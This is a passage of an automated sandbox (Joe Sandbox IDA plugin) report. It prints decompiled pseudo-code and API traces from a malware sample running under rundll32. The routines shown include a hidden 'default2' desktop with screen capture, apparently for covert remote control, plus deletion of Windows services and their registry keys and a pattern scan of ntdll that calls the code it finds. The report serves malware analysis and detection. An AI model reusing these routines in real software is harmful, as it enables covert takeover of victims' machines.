                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FindLocalwsprintf$AllocFile$CloseFirstFreeNext_wcsstrlstrlen
                                                            • String ID: %s\%s$%s\*.*
                                                            • API String ID: 2479123022-1665845743
                                                            • Opcode ID: 7f930593d81e61e902243ef4059b972626ea11c72e920e8830ca48d29c4038c9
                                                            • Instruction ID: 4618669f431fdb626efaca9b5b43d5cdcd54cfbe47121e367d9eadb08c8145cb
                                                            • Opcode Fuzzy Hash: 7f930593d81e61e902243ef4059b972626ea11c72e920e8830ca48d29c4038c9
                                                            • Instruction Fuzzy Hash: 6E91CF719002599BEF20DF24CC44BEAB7B9FF25315F4448A5E90DA7251FB72AA84CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 55%
                                                            			E046365A0(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				signed int _v12;
                                                            				short _v80;
                                                            				void* _v108;
                                                            				void* _v116;
                                                            				struct tagMONITORINFO _v120;
                                                            				struct _devicemodeW _v344;
                                                            				struct _OSVERSIONINFOA _v496;
                                                            				intOrPtr _v780;
                                                            				char _v784;
                                                            				signed int _t55;
                                                            				intOrPtr _t57;
                                                            				WCHAR* _t60;
                                                            				struct HMONITOR__* _t62;
                                                            				signed int _t77;
                                                            				struct HDC__* _t83;
                                                            				struct HDC__* _t84;
                                                            				intOrPtr* _t100;
                                                            				signed int _t103;
                                                            				struct HDC__* _t104;
                                                            				signed int _t109;
                                                            				intOrPtr* _t112;
                                                            				signed int _t114;
                                                            				char* _t115;
                                                            				signed int _t116;
                                                            
                                                            				_t109 = __edx;
                                                            				_t55 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t55 ^ _t116;
                                                            				_t57 = _a4;
                                                            				_t112 = __ecx;
                                                            				 *__ecx = 0x467e8b0;
                                                            				 *((intOrPtr*)(__ecx + 4)) = _t57;
                                                            				 *((intOrPtr*)(_t57 + 0x38)) = __ecx;
                                                            				 *((intOrPtr*)(_t112 + 8)) = CreateEventW(0, 1, 0, 0);
                                                            				 *_t112 = 0x467df68;
                                                            				E04636530();
                                                            				 *(_t112 + 0x74) = 0;
                                                            				 *(_t112 + 0x78) = 0;
                                                            				 *(_t112 + 0x7c) = 0;
                                                            				 *(_t112 + 0x80) = 0;
                                                            				 *(_t112 + 0x70) = L"default2";
                                                            				_t60 = OpenDesktopW(L"default2", 0, 1, 0x10000000);
                                                            				 *(_t112 + 0xc) = _t60;
                                                            				_t125 = _t60;
                                                            				if(_t60 == 0) {
                                                            					 *(_t112 + 0xc) = CreateDesktopW( *(_t112 + 0x70), _t60, _t60, _t60, 0x10000000, _t60);
                                                            				}
                                                            				SetThreadDesktop( *(_t112 + 0xc));
                                                            				_t62 = GetDesktopWindow();
                                                            				__imp__MonitorFromWindow(_t62, 2);
                                                            				_v120.cbSize = 0x68;
                                                            				GetMonitorInfoW(_t62,  &_v120);
                                                            				_v344.dmSize = 0xdc;
                                                            				EnumDisplaySettingsW( &_v80, 0xffffffff,  &_v344);
                                                            				_t114 = _v344.dmPelsWidth;
                                                            				_t100 = _t112 + 0x38;
                                                            				asm("movd xmm1, esi");
                                                            				asm("cvtdq2pd xmm1, xmm1");
                                                            				asm("addsd xmm1, [eax*8+0x467f970]");
                                                            				asm("movd xmm0, eax");
                                                            				asm("cvtdq2pd xmm0, xmm0");
                                                            				asm("divsd xmm1, xmm0");
                                                            				asm("movsd [edi+0x68], xmm1");
                                                            				E0465DEA0(_t112, _t100, 0, 0x2c);
                                                            				_t103 = _v344.dmPelsHeight;
                                                            				 *_t100 = 0x28;
                                                            				asm("cdq");
                                                            				 *(_t112 + 0x3c) = _t114;
                                                            				 *(_t112 + 0x40) = _t103;
                                                            				 *((intOrPtr*)(_t112 + 0x44)) = 0x180001;
                                                            				 *(_t112 + 0x48) = 0;
                                                            				 *(_t112 + 0x58) = 0;
                                                            				_t77 = (0x1f + (_t114 + _t114 * 2) * 8 + (_t109 & 0x0000001f) >> 5) * _t103 << 2;
                                                            				_push(_t77);
                                                            				 *(_t112 + 0x4c) = _t77;
                                                            				 *((intOrPtr*)(_t112 + 0x10)) = L04655B55(_t103, _t114, _t125);
                                                            				_push( *(_t112 + 0x4c));
                                                            				 *((intOrPtr*)(_t112 + 0x88)) = L04655B55(_t103, _t114, _t125);
                                                            				_push( *(_t112 + 0x4c) +  *(_t112 + 0x4c));
                                                            				 *((intOrPtr*)(_t112 + 0x84)) = L04655B55(_t103, _t114, _t125);
                                                            				_t83 = GetDC(0);
                                                            				 *(_t112 + 0x14) = _t83;
                                                            				_t84 = CreateCompatibleDC(_t83);
                                                            				asm("movsd xmm0, [edi+0x68]");
                                                            				_t104 = _t84;
                                                            				 *(_t112 + 0x20) =  *(_t112 + 0x14);
                                                            				 *(_t112 + 0x18) = _t104;
                                                            				 *(_t112 + 0x24) = _t104;
                                                            				asm("movsd [edi+0x28], xmm0");
                                                            				_v496.dwOSVersionInfoSize = 0x94;
                                                            				GetVersionExA( &_v496);
                                                            				E04645A50( &_v784, _t112, _t114);
                                                            				 *((intOrPtr*)(_t112 + 0x30)) = _v784;
                                                            				_push(0x2d);
                                                            				 *((intOrPtr*)(_t112 + 0x34)) = _v780;
                                                            				_t115 = L04655B55( &_v784, _t114, _t125);
                                                            				if(_t115 != 0) {
                                                            					_t52 = _t115 + 1; // 0x1
                                                            					 *_t115 = 0xac;
                                                            					E0465E060(_t52, _t100, 0x2c);
                                                            					_push(0x3f);
                                                            					_push(0x2d);
                                                            					_push(_t115);
                                                            					E04631C60( *((intOrPtr*)(_t112 + 4)));
                                                            					L04655B0F(_t115);
                                                            				}
                                                            				return E04655AFE(_v12 ^ _t116);
                                                            			}

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 046365CF
                                                              • Part of subcall function 04636530: LoadLibraryA.KERNEL32(User32.dll,?,046365E3), ref: 04636536
                                                            • OpenDesktopW.USER32(default2,00000000,00000001,10000000), ref: 04636617
                                                            • CreateDesktopW.USER32(0467DA98,00000000,00000000,00000000,10000000,00000000), ref: 04636630
                                                            • SetThreadDesktop.USER32(?), ref: 0463663C
                                                            • GetDesktopWindow.USER32 ref: 04636642
                                                            • MonitorFromWindow.USER32(00000000,00000002), ref: 0463664B
                                                            • GetMonitorInfoW.USER32(00000000,00000000), ref: 0463665D
                                                            • EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0463667A
                                                            • GetDC.USER32(00000000), ref: 04636739
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 04636743
                                                            • GetVersionExA.KERNEL32(?), ref: 04636772
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Desktop$Create$MonitorWindow$CompatibleDisplayEnumEventFromInfoLibraryLoadOpenSettingsThreadVersion
                                                            • String ID: default2$h
                                                            • API String ID: 1408810681-1613360701
                                                            • Opcode ID: 4d05dcf4b2a66dab57275c6dcc983a4597337ad7ad2eba7fa1009372112336bf
                                                            • Instruction ID: 20a206e679351d1147df4d68cce1d97b124f0ed05ce3e67d3ebdb7de68885162
                                                            • Opcode Fuzzy Hash: 4d05dcf4b2a66dab57275c6dcc983a4597337ad7ad2eba7fa1009372112336bf
                                                            • Instruction Fuzzy Hash: 7C615DB090070AAFE715DF74DC49B9ABBB8FF04304F004229E90997690EB75BA64CF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 45%
                                                            			E04633C30(void* __ebx, void* __edi, void* __esi, char* _a4) {
                                                            				signed int _v8;
                                                            				intOrPtr _v14;
                                                            				intOrPtr _v18;
                                                            				intOrPtr _v22;
                                                            				intOrPtr _v26;
                                                            				intOrPtr _v30;
                                                            				intOrPtr _v34;
                                                            				intOrPtr _v38;
                                                            				intOrPtr _v42;
                                                            				char _v44;
                                                            				intOrPtr _v48;
                                                            				unsigned int _v52;
                                                            				intOrPtr _v56;
                                                            				intOrPtr _v60;
                                                            				intOrPtr _v64;
                                                            				intOrPtr _v68;
                                                            				long _v72;
                                                            				signed int _t84;
                                                            				long _t103;
                                                            				unsigned int _t107;
                                                            				intOrPtr _t117;
                                                            				signed int _t119;
                                                            				intOrPtr _t135;
                                                            				signed int _t137;
                                                            				void* _t146;
                                                            				intOrPtr _t152;
                                                            				long _t154;
                                                            				signed int _t155;
                                                            				signed int _t156;
                                                            				intOrPtr _t157;
                                                            				char* _t159;
                                                            				signed int _t160;
                                                            
                                                            				_t84 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t84 ^ _t160;
                                                            				_t159 = _a4;
                                                            				_v72 = GetTickCount();
                                                            				_t154 = GetTickCount();
                                                            				_v56 =  *((intOrPtr*)(_t159 + 0x10));
                                                            				_v60 =  *((intOrPtr*)(_t159 + 0x14));
                                                            				_v64 =  *((intOrPtr*)(_t159 + 0x18));
                                                            				_v68 =  *((intOrPtr*)(_t159 + 0x1c));
                                                            				_v44 = 0x267;
                                                            				while( *((char*)(_t159 + 1)) != 0) {
                                                            					_t103 = GetTickCount();
                                                            					_t142 = _t103 - _t154;
                                                            					_t107 = 0x10624dd3 * (_t103 - _t154) >> 0x20 >> 6;
                                                            					_v52 = _t107;
                                                            					if(_t107 >= 5) {
                                                            						_t154 = GetTickCount();
                                                            						_v48 = _t154;
                                                            						if( *((intOrPtr*)( *((intOrPtr*)(_t159 + 4)) + 8)) != 0) {
                                                            							_t152 =  *((intOrPtr*)(_t159 + 0x14));
                                                            							_t157 =  *((intOrPtr*)(_t159 + 0x18));
                                                            							_t135 =  *((intOrPtr*)(_t159 + 0x1c));
                                                            							_v42 =  *((intOrPtr*)(_t159 + 0x10));
                                                            							_v38 = _t152;
                                                            							asm("sbb edx, [ebp-0x38]");
                                                            							_v34 = _t157;
                                                            							_v30 = _t135;
                                                            							_v26 = E04671B40( *((intOrPtr*)(_t159 + 0x10)) - _v56, _t152, _v52, 0);
                                                            							_t146 = _t157 - _v64;
                                                            							_v22 = _t152;
                                                            							asm("sbb eax, [ebp-0x40]");
                                                            							_v18 = E04671B40(_t146, _t135, _v52, 0);
                                                            							_push(_t146);
                                                            							_t142 =  *(_t159 + 8);
                                                            							_v56 =  *((intOrPtr*)(_t159 + 0x10));
                                                            							_push(0x3f);
                                                            							_v60 =  *((intOrPtr*)(_t159 + 0x14));
                                                            							_push(0x22);
                                                            							_push( &_v44);
                                                            							_v14 = _t152;
                                                            							_v64 = _t157;
                                                            							_v68 = _t135;
                                                            							E04631C60( *(_t159 + 8));
                                                            							_t154 = _v48;
                                                            						}
                                                            						_t117 =  *((intOrPtr*)(_t159 + 4));
                                                            						if( *((short*)(_t117 + 0x16)) == 2) {
                                                            							_t156 = 0;
                                                            							if( *((intOrPtr*)(_t117 + 0x1c)) > 0) {
                                                            								do {
                                                            									_t119 = E0465EF46(_t142) & 0x800000ff;
                                                            									if(_t119 < 0) {
                                                            										_t119 = (_t119 - 0x00000001 | 0xffffff00) + 1;
                                                            									}
                                                            									_t142 =  *( *((intOrPtr*)(_t159 + 4)) + 0x3c);
                                                            									 *(_t156 +  *( *((intOrPtr*)(_t159 + 4)) + 0x3c)) = _t119;
                                                            									_t156 = _t156 + 1;
                                                            								} while (_t156 <  *((intOrPtr*)( *((intOrPtr*)(_t159 + 4)) + 0x1c)));
                                                            							}
                                                            							_t154 = _v48;
                                                            						}
                                                            					}
                                                            					Sleep(0x64);
                                                            					_t137 = GetTickCount() - _v72;
                                                            					if(0x88888889 * (0x10624dd3 * _t137 >> 0x20 >> 6) >> 0x20 >> 5 >= ( *( *((intOrPtr*)(_t159 + 4)) + 0x14) & 0x0000ffff)) {
                                                            						 *((char*)(_t159 + 1)) = 0;
                                                            					}
                                                            				}
                                                            				if( *((intOrPtr*)(_t159 + 0x38)) != 0) {
                                                            					_t137 = 0;
                                                            					_t155 = 0;
                                                            					if(0 <  *( *((intOrPtr*)(_t159 + 4)) + 0x12)) {
                                                            						do {
                                                            							WaitForSingleObject( *( *((intOrPtr*)(_t159 + 0x38)) + _t155 * 4), 0xffffffff);
                                                            							CloseHandle( *( *((intOrPtr*)(_t159 + 0x38)) + _t155 * 4));
                                                            							_t155 = _t155 + 1;
                                                            						} while (_t155 < ( *( *((intOrPtr*)(_t159 + 4)) + 0x12) & 0x0000ffff));
                                                            					}
                                                            					 *_t159 = 1;
                                                            				}
                                                            				_push(_t137);
                                                            				_push(0x3f);
                                                            				_push(2);
                                                            				_v44 = 0x67;
                                                            				E04631C60( *(_t159 + 8));
                                                            				return E04655AFE(_v8 ^ _t160,  &_v44);
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CountTick$__aulldiv$CloseHandleObjectSingleSleepWait
                                                            • String ID: g
                                                            • API String ID: 227884459-30677878
                                                            • Opcode ID: 7fc03dfa3f2822d25f213b251d6e79793d3e9491f493205cc09991233bf82b84
                                                            • Instruction ID: a318edc56b9efc55002c96959eae0022e5980e9e131e4a4b9373bd44b15a088f
                                                            • Opcode Fuzzy Hash: 7fc03dfa3f2822d25f213b251d6e79793d3e9491f493205cc09991233bf82b84
                                                            • Instruction Fuzzy Hash: 45512871A006089FDB24DFA9D984AAEBBF5FF48710F40851AE44AE7761E730F844CB24
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 95%
                                                            			E04643A60(void* __ebx, short* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				short _v2056;
                                                            				intOrPtr _v2080;
                                                            				struct _SERVICE_STATUS _v2084;
                                                            				short* _v2088;
                                                            				void* _v2092;
                                                            				signed int _t13;
                                                            				void* _t15;
                                                            				void* _t38;
                                                            				short* _t41;
                                                            				void* _t42;
                                                            				signed int _t43;
                                                            
                                                            				_t13 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t13 ^ _t43;
                                                            				_t41 = __ecx;
                                                            				_v2088 = __ecx;
                                                            				_t15 = OpenSCManagerW(0, 0, 0xf003f);
                                                            				_v2092 = _t15;
                                                            				if(_t15 == 0) {
                                                            					L12:
                                                            					return E04655AFE(_v8 ^ _t43);
                                                            				}
                                                            				_t38 = OpenServiceW(_t15, _t41, 0xf01ff);
                                                            				if(_t38 == 0) {
                                                            					L11:
                                                            					CloseServiceHandle(_v2092);
                                                            					goto L12;
                                                            				}
                                                            				_t42 = 0;
                                                            				do {
                                                            					if(QueryServiceStatus(_t38,  &_v2084) == 0) {
                                                            						goto L6;
                                                            					}
                                                            					if(_v2080 == 1) {
                                                            						if(DeleteService(_t38) != 0) {
                                                            							E0465DEA0(_t38,  &_v2056, 0, 0x800);
                                                            							wsprintfW( &_v2056, L"SYSTEM\\CurrentControlSet\\Services\\%s", _v2088);
                                                            							SHDeleteKeyW(0x80000002,  &_v2056);
                                                            						}
                                                            						L10:
                                                            						CloseServiceHandle(_t38);
                                                            						goto L11;
                                                            					}
                                                            					ControlService(_t38, 1,  &_v2084);
                                                            					Sleep(0x1f4);
                                                            					L6:
                                                            					_t42 = _t42 + 0x1f4;
                                                            				} while (_t42 < 0x1388);
                                                            				goto L10;
                                                            			}

                                                            APIs
                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 04643A86
                                                            • OpenServiceW.ADVAPI32(00000000,?,000F01FF), ref: 04643AA2
                                                            • QueryServiceStatus.ADVAPI32(00000000,?,?,000F01FF), ref: 04643ABC
                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,000F01FF), ref: 04643AD9
                                                            • Sleep.KERNEL32(000001F4,?,000F01FF), ref: 04643AE4
                                                            • DeleteService.ADVAPI32(00000000,?,000F01FF), ref: 04643AFB
                                                            • wsprintfW.USER32 ref: 04643B2A
                                                            • SHDeleteKeyW.SHLWAPI(80000002,?), ref: 04643B3F
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF), ref: 04643B4B
                                                            • CloseServiceHandle.ADVAPI32(?,?,000F01FF), ref: 04643B57
                                                            Strings
                                                            • SYSTEM\CurrentControlSet\Services\%s, xrefs: 04643B24
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseDeleteHandleOpen$ControlManagerQuerySleepStatuswsprintf
                                                            • String ID: SYSTEM\CurrentControlSet\Services\%s
                                                            • API String ID: 3594024867-2757632955
                                                            • Opcode ID: aea0e065b9dbea50fe89095ca7aabda3d8458eb2c8bedea9ccd8c16def2e9bf3
                                                            • Instruction ID: 60a907ef127f28147c5c2b74a12a7c26217fbb610d5a16456e75994155dffcae
                                                            • Opcode Fuzzy Hash: aea0e065b9dbea50fe89095ca7aabda3d8458eb2c8bedea9ccd8c16def2e9bf3
                                                            • Instruction Fuzzy Hash: C521C471A40218ABDB205B64DC4CFBAB7BCFB54711F0050A9BA09E2241FE759D858FE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 49%
                                                            			E0463C9B0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				signed int _v8;
                                                            				short _v12;
                                                            				char _v16;
                                                            				char _v18;
                                                            				short _v20;
                                                            				intOrPtr _v24;
                                                            				char _v28;
                                                            				signed int _v32;
                                                            				short _v36;
                                                            				char _v40;
                                                            				intOrPtr _v304;
                                                            				signed int _v308;
                                                            				intOrPtr _v312;
                                                            				char _v316;
                                                            				intOrPtr _v320;
                                                            				signed int _v324;
                                                            				signed int _t97;
                                                            				intOrPtr _t99;
                                                            				_Unknown_base(*)()* _t104;
                                                            				void* _t109;
                                                            				intOrPtr _t110;
                                                            				signed int _t111;
                                                            				void* _t112;
                                                            				void* _t117;
                                                            				void* _t123;
                                                            				void* _t128;
                                                            				void* _t131;
                                                            				void* _t135;
                                                            				void* _t138;
                                                            				void* _t141;
                                                            				signed int _t146;
                                                            				intOrPtr _t150;
                                                            				signed int _t156;
                                                            				signed int _t157;
                                                            				void* _t158;
                                                            				void* _t163;
                                                            				void* _t169;
                                                            				void* _t173;
                                                            				void* _t174;
                                                            				signed int _t177;
                                                            				void* _t178;
                                                            				void* _t179;
                                                            				intOrPtr* _t183;
                                                            				signed int _t184;
                                                            				signed int _t186;
                                                            				void* _t187;
                                                            				void* _t189;
                                                            				void* _t191;
                                                            				void* _t194;
                                                            				signed int _t197;
                                                            				void* _t198;
                                                            				char* _t200;
                                                            				void* _t202;
                                                            				struct HINSTANCE__* _t204;
                                                            				void* _t206;
                                                            				signed int _t207;
                                                            				signed int _t208;
                                                            				void* _t210;
                                                            				signed int _t212;
                                                            				void* _t215;
                                                            				void* _t217;
                                                            				void* _t218;
                                                            				void* _t220;
                                                            				signed int _t224;
                                                            
                                                            				_t187 = __edi;
                                                            				_t141 = __ebx;
                                                            				_t97 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t97 ^ _t224;
                                                            				_t99 =  *((intOrPtr*)(__ecx + 0xc));
                                                            				if( *((intOrPtr*)(_t99 + 0xc0)) <= 0 ||  *((intOrPtr*)(_t99 + 0xc4)) <= 0) {
                                                            					L94:
                                                            					__eflags = _v8 ^ _t224;
                                                            					return E04655AFE(_v8 ^ _t224);
                                                            				} else {
                                                            					_t204 = GetModuleHandleA("ntdll");
                                                            					if(_t204 == 0) {
                                                            						L93:
                                                            						goto L94;
                                                            					} else {
                                                            						E0465DEA0(__edi,  &_v316, 0, 0x114);
                                                            						_t104 = GetProcAddress(_t204, "RtlGetVersion");
                                                            						if(_t104 == 0) {
                                                            							goto L93;
                                                            						} else {
                                                            							_push( &_v316);
                                                            							if( *_t104() != 0 || _t204->i != 0x5a4d) {
                                                            								goto L93;
                                                            							} else {
                                                            								_t183 =  *((intOrPtr*)(_t204 + 0x3c)) + _t204;
                                                            								if( *_t183 != 0x4550) {
                                                            									goto L93;
                                                            								} else {
                                                            									_t156 = 0;
                                                            									_t109 = ( *(_t183 + 0x14) & 0x0000ffff) + 0x18 + _t183;
                                                            									_t184 =  *(_t183 + 6) & 0x0000ffff;
                                                            									if(_t184 == 0) {
                                                            										goto L93;
                                                            									} else {
                                                            										while(( *(_t109 + 0x24) & 0x20000000) == 0) {
                                                            											_t156 = _t156 + 1;
                                                            											_t109 = _t109 + 0x28;
                                                            											if(_t156 < _t184) {
                                                            												continue;
                                                            											} else {
                                                            												return E04655AFE(_v8 ^ _t224);
                                                            											}
                                                            											goto L95;
                                                            										}
                                                            										_t157 =  *(_t109 + 0x10);
                                                            										_v324 = _t157;
                                                            										_t186 =  *((intOrPtr*)(_t109 + 0xc)) + _t204;
                                                            										__eflags = _t186;
                                                            										if(_t186 == 0) {
                                                            											goto L93;
                                                            										} else {
                                                            											__eflags = _t157;
                                                            											if(_t157 == 0) {
                                                            												goto L93;
                                                            											} else {
                                                            												_t110 = _v312;
                                                            												_push(_t141);
                                                            												_push(_t187);
                                                            												__eflags = _t110 - 0xa;
                                                            												if(_t110 != 0xa) {
                                                            													__eflags = _t110 - 6;
                                                            													if(_t110 != 6) {
                                                            														goto L92;
                                                            													} else {
                                                            														_t111 = _v308;
                                                            														__eflags = _t111 - 3;
                                                            														if(_t111 == 3) {
                                                            															goto L49;
                                                            														} else {
                                                            															__eflags = _t111 - 2;
                                                            															if(_t111 != 2) {
                                                            																__eflags = _t111 - 1;
                                                            																if(_t111 != 1) {
                                                            																	goto L92;
                                                            																} else {
                                                            																	_v24 = 0x458d2074;
                                                            																	_t191 = _t157 - 8;
                                                            																	_v20 = 0x96a50d4;
                                                            																	_t210 = 0;
                                                            																	__eflags = 0;
                                                            																	do {
                                                            																		_t163 = 0;
                                                            																		__eflags = 0;
                                                            																		while(1) {
                                                            																			_t117 = _t163 + _t210;
                                                            																			__eflags =  *((intOrPtr*)(_t117 + _t186)) -  *((intOrPtr*)(_t224 + _t163 - 0x14));
                                                            																			if( *((intOrPtr*)(_t117 + _t186)) !=  *((intOrPtr*)(_t224 + _t163 - 0x14))) {
                                                            																				break;
                                                            																			}
                                                            																			_t163 = _t163 + 1;
                                                            																			__eflags = _t163 - 8;
                                                            																			if(_t163 < 8) {
                                                            																				continue;
                                                            																			}
                                                            																			break;
                                                            																		}
                                                            																		__eflags = _t163 - 8;
                                                            																		if(_t163 == 8) {
                                                            																			_t212 = _t210 + 0xffffffec + _t186;
                                                            																			__eflags = _t212;
                                                            																			if(_t212 == 0) {
                                                            																				goto L92;
                                                            																			} else {
                                                            																				 *((intOrPtr*)(VirtualAlloc(0, 0x50, 0x3000, 4) + 0x18)) = _a4;
                                                            																				 *_t212();
                                                            																				__eflags = _v8 ^ _t224;
                                                            																				return E04655AFE(_v8 ^ _t224, _t119);
                                                            																			}
                                                            																		} else {
                                                            																			goto L84;
                                                            																		}
                                                            																		goto L95;
                                                            																		L84:
                                                            																		_t210 = _t210 + 1;
                                                            																		__eflags = _t210 - _t191;
                                                            																	} while (_t210 <= _t191);
                                                            																	__eflags = _v8 ^ _t224;
                                                            																	return E04655AFE(_v8 ^ _t224);
                                                            																}
                                                            															} else {
                                                            																_t146 = 0;
                                                            																_v16 = 0x8908458b;
                                                            																_v12 = 0xa045;
                                                            																_t194 = _t157 - 6;
                                                            																_v32 = 0x23fb4868;
                                                            																_t215 = 0;
                                                            																__eflags = 0;
                                                            																_v28 = 0x6a;
                                                            																do {
                                                            																	_t169 = 0;
                                                            																	__eflags = 0;
                                                            																	while(1) {
                                                            																		_t123 = _t169 + _t215;
                                                            																		__eflags =  *((intOrPtr*)(_t123 + _t186)) -  *((intOrPtr*)(_t224 + _t169 - 0xc));
                                                            																		if( *((intOrPtr*)(_t123 + _t186)) !=  *((intOrPtr*)(_t224 + _t169 - 0xc))) {
                                                            																			break;
                                                            																		}
                                                            																		_t169 = _t169 + 1;
                                                            																		__eflags = _t169 - 6;
                                                            																		if(_t169 < 6) {
                                                            																			continue;
                                                            																		}
                                                            																		break;
                                                            																	}
                                                            																	__eflags = _t169 - 6;
                                                            																	if(_t169 == 6) {
                                                            																		_t146 = _t186 - 0xc + _t215;
                                                            																		__eflags = _t146;
                                                            																	} else {
                                                            																		goto L64;
                                                            																	}
                                                            																	L67:
                                                            																	__eflags = _t146;
                                                            																	if(_t146 != 0) {
                                                            																		L77:
                                                            																		 *((intOrPtr*)(VirtualAlloc(0, 0x50, 0x3000, 4) + 0x18)) = _a4;
                                                            																		 *_t146();
                                                            																		__eflags = _v8 ^ _t224;
                                                            																		return E04655AFE(_v8 ^ _t224, _t125);
                                                            																	} else {
                                                            																		_t217 = 0;
                                                            																		_t197 = _v324 + 0xfffffffb;
                                                            																		__eflags = _t197;
                                                            																		do {
                                                            																			_t173 = 0;
                                                            																			asm("o16 nop [eax+eax]");
                                                            																			while(1) {
                                                            																				_t128 = _t173 + _t217;
                                                            																				__eflags =  *((intOrPtr*)(_t128 + _t186)) -  *((intOrPtr*)(_t224 + _t173 - 0x1c));
                                                            																				if( *((intOrPtr*)(_t128 + _t186)) !=  *((intOrPtr*)(_t224 + _t173 - 0x1c))) {
                                                            																					break;
                                                            																				}
                                                            																				_t173 = _t173 + 1;
                                                            																				__eflags = _t173 - 5;
                                                            																				if(_t173 < 5) {
                                                            																					continue;
                                                            																				}
                                                            																				break;
                                                            																			}
                                                            																			__eflags = _t173 - 5;
                                                            																			if(_t173 == 5) {
                                                            																				_t146 = _t186 - 7 + _t217;
                                                            																				__eflags = _t146;
                                                            																			} else {
                                                            																				goto L73;
                                                            																			}
                                                            																			L76:
                                                            																			__eflags = _t146;
                                                            																			if(_t146 == 0) {
                                                            																				goto L92;
                                                            																			} else {
                                                            																				goto L77;
                                                            																			}
                                                            																			goto L95;
                                                            																			L73:
                                                            																			_t217 = _t217 + 1;
                                                            																			__eflags = _t217 - _t197;
                                                            																		} while (_t217 <= _t197);
                                                            																		goto L76;
                                                            																	}
                                                            																	goto L95;
                                                            																	L64:
                                                            																	_t215 = _t215 + 1;
                                                            																	__eflags = _t215 - _t194;
                                                            																} while (_t215 <= _t194);
                                                            																goto L67;
                                                            															}
                                                            														}
                                                            													}
                                                            												} else {
                                                            													__eflags = _v308;
                                                            													if(_v308 != 0) {
                                                            														L92:
                                                            														goto L93;
                                                            													} else {
                                                            														_t150 = _v304;
                                                            														__eflags = _t150 - 0x3fab;
                                                            														if(_t150 <= 0x3fab) {
                                                            															__eflags = _t150 - 0x3ad7 - 0x4d4;
                                                            															if(_t150 - 0x3ad7 > 0x4d4) {
                                                            																__eflags = _t150 - 0x3ad7;
                                                            																if(_t150 >= 0x3ad7) {
                                                            																	goto L92;
                                                            																} else {
                                                            																	L49:
                                                            																	_v24 = 0x6a096a50;
                                                            																	_t189 = _t157 - 7;
                                                            																	_v20 = 0x8b01;
                                                            																	_t206 = 0;
                                                            																	__eflags = 0;
                                                            																	_v18 = 0xc1;
                                                            																	do {
                                                            																		_t158 = 0;
                                                            																		__eflags = 0;
                                                            																		while(1) {
                                                            																			_t112 = _t158 + _t206;
                                                            																			__eflags =  *((intOrPtr*)(_t112 + _t186)) -  *((intOrPtr*)(_t224 + _t158 - 0x14));
                                                            																			if( *((intOrPtr*)(_t112 + _t186)) !=  *((intOrPtr*)(_t224 + _t158 - 0x14))) {
                                                            																				break;
                                                            																			}
                                                            																			_t158 = _t158 + 1;
                                                            																			__eflags = _t158 - 7;
                                                            																			if(_t158 < 7) {
                                                            																				continue;
                                                            																			}
                                                            																			break;
                                                            																		}
                                                            																		__eflags = _t158 - 7;
                                                            																		if(_t158 == 7) {
                                                            																			_t207 = _t206 + 0xffffffe5;
                                                            																			__eflags = _t207;
                                                            																			goto L89;
                                                            																		} else {
                                                            																			goto L54;
                                                            																		}
                                                            																		goto L95;
                                                            																		L54:
                                                            																		_t206 = _t206 + 1;
                                                            																		__eflags = _t206 - _t189;
                                                            																	} while (_t206 <= _t189);
                                                            																	__eflags = _v8 ^ _t224;
                                                            																	return E04655AFE(_v8 ^ _t224);
                                                            																}
                                                            															} else {
                                                            																_v16 = 0x4d8dc18b;
                                                            																_t198 = _t157 - 6;
                                                            																_v12 = 0x51bc;
                                                            																_t218 = 0;
                                                            																__eflags = 0;
                                                            																do {
                                                            																	_t174 = 0;
                                                            																	__eflags = 0;
                                                            																	while(1) {
                                                            																		_t131 = _t174 + _t218;
                                                            																		__eflags =  *((intOrPtr*)(_t131 + _t186)) -  *((intOrPtr*)(_t224 + _t174 - 0xc));
                                                            																		if( *((intOrPtr*)(_t131 + _t186)) !=  *((intOrPtr*)(_t224 + _t174 - 0xc))) {
                                                            																			break;
                                                            																		}
                                                            																		_t174 = _t174 + 1;
                                                            																		__eflags = _t174 - 6;
